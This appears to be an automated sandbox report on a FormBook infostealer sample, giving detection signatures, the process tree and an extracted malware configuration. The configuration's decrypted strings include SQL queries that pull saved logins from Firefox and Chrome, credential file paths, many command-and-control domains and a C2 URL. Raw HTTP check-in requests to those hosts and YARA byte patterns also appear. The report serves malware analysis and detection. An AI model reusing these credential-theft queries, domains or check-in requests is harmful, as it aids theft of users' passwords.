Loading ...

Play interactive tourEdit tour

Analysis Report YvGnm93rap.exe

Overview

General Information

Sample Name:YvGnm93rap.exe
Analysis ID:339311
MD5:16e1a5d26c0698ac48d63661264e0ba1
SHA1:5e61d05157c4aa1acfc6a89de619f6bbcad176f6
SHA256:e4e84d03d4cb709d737f9ee3e69b40d797e452d83faa35f0a06bb78a87ad0984
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • YvGnm93rap.exe (PID: 2396 cmdline: 'C:\Users\user\Desktop\YvGnm93rap.exe' MD5: 16E1A5D26C0698AC48D63661264E0BA1)
    • YvGnm93rap.exe (PID: 6196 cmdline: {path} MD5: 16E1A5D26C0698AC48D63661264E0BA1)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 6460 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6564 cmdline: /c del 'C:\Users\user\Desktop\YvGnm93rap.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79df", "KEY1_OFFSET 0x1bbd0", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1bc26", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9f116468", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715052", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0122fe", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01475", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "fakecostasunglasses.com", "twinbrothers.pizza", "jizhoujsp.com", "qscrit.com", "hotelmanise.com", "fer-ua.online", "europserver-simcloud.systems", "redwap2.pro", "betwalkoffame.com", "latashalovemillionaire.com", "8million-lr.com", "tomatrader.com", "modaluxcutabovefitness.com", "shishijiazu.com", "cckytx.com", "reversehomeloansmiami.com", "imaginenationnetwork.com", "thecyclistshop.com", "jorgegiljewelry.com", "hlaprotiens.com", "biblecourt.com", "puzelhome.com", "musicbychristina.com", "iregentos.info", "ephwehemeral.com", "qubeeva.com", "healingwithkarlee.com", "giftasmile2day.com", "ondesign03.net", "argusproductionsus.com", "tootleshook.com", "sukien-freefire12.com", "windmaske.com", "futbolclubbarcelona.soccer", "veteransc60.com", "steambackpacktrade.info", "zingnation.com", "myfoodworldcup.com", "playitaintso.net", "crafteest.com", "deutschekorrosionsschutz.net", "streamcommunitty.com", "gatehess.com", "hechoenvegas.net", "4037a.com", "santanabeautycares.com", "100feetpics.com", "johnsroadantiques.com", "improve-climbing.com", "18shuwu.net", "amazon-support-recovery.com", "vibrarecovery.com", "deskdonors.info", "triagggroup.com", "probysweden.com", "helloinward.com", "vvardown.com", "kicksends.com", "alwayadopt.com", "modernappsllc.com", "itswooby.com", "med.vegas", "chadwestconsulting.com", "africanosworld.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.bodyfuelrtd.com/8rg4/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.YvGnm93rap.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.YvGnm93rap.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.YvGnm93rap.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x158b9:$sqlite3step: 68 34 1C 7B E1
          • 0x159cc:$sqlite3step: 68 34 1C 7B E1
          • 0x158e8:$sqlite3text: 68 38 2A 90 C5
          • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
          • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
          2.2.YvGnm93rap.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            2.2.YvGnm93rap.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 2.2.YvGnm93rap.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79df", "KEY1_OFFSET 0x1bbd0", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1bc26", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9f116468", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715052", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0122fe", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01475", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
            Multi AV Scanner detection for submitted fileShow sources
            Source: YvGnm93rap.exeVirustotal: Detection: 46%Perma Link
            Source: YvGnm93rap.exeReversingLabs: Detection: 26%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: YvGnm93rap.exeJoe Sandbox ML: detected
            Source: 2.2.YvGnm93rap.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: YvGnm93rap.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: YvGnm93rap.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: msiexec.pdb source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
            Source: Binary string: msiexec.pdbGCTL source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: YvGnm93rap.exe, 00000002.00000003.226603868.0000000000BA0000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: YvGnm93rap.exe
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 4x nop then pop ebx2_2_00406A98
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 4x nop then pop edi2_2_0040C3EB

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49729 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49729 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49729 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49763 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49763 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49763 -> 34.102.136.180:80
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1Host: www.100feetpics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1Host: www.reversehomeloansmiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1Host: www.tomatrader.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1Host: www.futbolclubbarcelona.soccerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1Host: www.ondesign03.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1Host: www.crafteest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1Host: www.4037a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1Host: www.puzelhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=A4ItsHP+WlrLG/knzE1FqdRUH2iuHEJ7BxsWyFaOnTa5UmbK6eGivqtSi2ljMDHkmrx5 HTTP/1.1Host: www.bodyfuelrtd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1Host: www.100feetpics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1Host: www.reversehomeloansmiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1Host: www.tomatrader.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1Host: www.futbolclubbarcelona.soccerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1Host: www.ondesign03.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1Host: www.crafteest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1Host: www.4037a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1Host: www.puzelhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
            Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
            Source: Joe Sandbox ViewASN Name: SUPERHOST-PL-ASPL SUPERHOST-PL-ASPL
            Source: Joe Sandbox ViewASN Name: LEASEWEB-NL-AMS-01NetherlandsNL LEASEWEB-NL-AMS-01NetherlandsNL
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1Host: www.100feetpics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1Host: www.reversehomeloansmiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1Host: www.tomatrader.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1Host: www.futbolclubbarcelona.soccerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
